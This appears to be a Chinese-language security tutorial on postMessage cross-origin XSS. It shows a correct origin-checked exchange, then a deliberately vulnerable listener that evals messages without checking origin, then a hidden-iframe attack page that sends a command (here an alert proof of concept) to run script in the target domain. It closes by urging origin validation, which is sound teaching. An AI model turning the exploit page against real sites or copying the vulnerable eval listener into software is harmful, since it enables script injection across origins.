0x00
浏览器有同源策略,规定js访问必须遵循同源策略,即满足同协议-同域名-同端口条件才能访问web资源,cookie,dom等等。
跨域的方式也有很多种,jsonp,window.name,document.cookie,其中postMessage就是一种跨域的方法。
使用postMessage方法时,我们只要发送端拥有某个窗口的有效js的句柄,就可以通过这套机制向该窗口发送任意长度的文本信息。
场景:
pay.example.com根目录下有个页面想获取用户的登录信息,为了达到这个目的,pay.example.com的根路径下有个页面加载了一个指向login.example.com的子框架。
1、这个子框架只需要发出以下指令:
parent.postMessage("user=bob", "https://pay.example.com");
2、在pay.example.com中获取这个message:
//对传进来需要处理的消息先进行注册
addEventListener("message", user_info, false) ;
//收到实际数据时的具体处理
function user_info(msg){
if(msg.origin == "https://login.example.com"){
//根据计划使用msg.data数据
}
}
从上面的代码可以看出,使用postMessage时,必须要判断消息的来源,使用回调参数中的origin属性进行判断,从而限制不可信域请求我们的资源。但是有时候由于疏忽,会漏掉判断,这就会导致安全问题。
0x01
看一段代码:
The secret is random and different for each visitor.<br/>
<br />
Xss It!
<script>
var secret = Math.random();
var data=localStorage.getItem("secret");
if(!data){
data=secret;
localStorage.setItem("secret",data)
}
data=data+"";
console.log("secret is :"+ data);
window.addEventListener("message",function(e){
var d=e.data;
if(!d || !d.secret){return;}
var token=d.secret;
var action=d.action;
switch(action){
case "check":
if(data.match(new RegExp(token))){
console.log("ok");
}
break;
case "run":
if(token === data){
eval(d.cmd);
}
break;
default:
void 0;
}
})
</script>
页面通过addEventListenr方法捕捉一个message事件,但是没有判断请求的来源就进行eval操作,这就会导致任意域在本域执行JS代码。写个页面即可,先获取窗口句柄,再发送恶意数据即可。
代码如下:
<!DOCTYPE html>
<html>
<body>
postMessage for xss test
<script>
var f = document.createElement('iframe') ;
f.style = "display:none;" ;
f.width = "0" ;
f.height = '0' ;
f.name = "poor" ;
f.src = "http://xxoo.sinaapp.com/test/test.htm" ;
document.body.appendChild(f) ;
f.onload = function(){
var w = f.contentWindow ;
w.postMessage({secret:"0.8192312608007342",action:'run',cmd:'alert(location.href)'},"http://xxoo.sinaapp.com/test/test.htm") ;
}
</script>
</body>
</html>
通过这种方式可以在xxoo.sinaapp.com域上执行任意js代码,突破同源限制。所以,以后使用postMessage跨域,应该做好一定的防范和验证。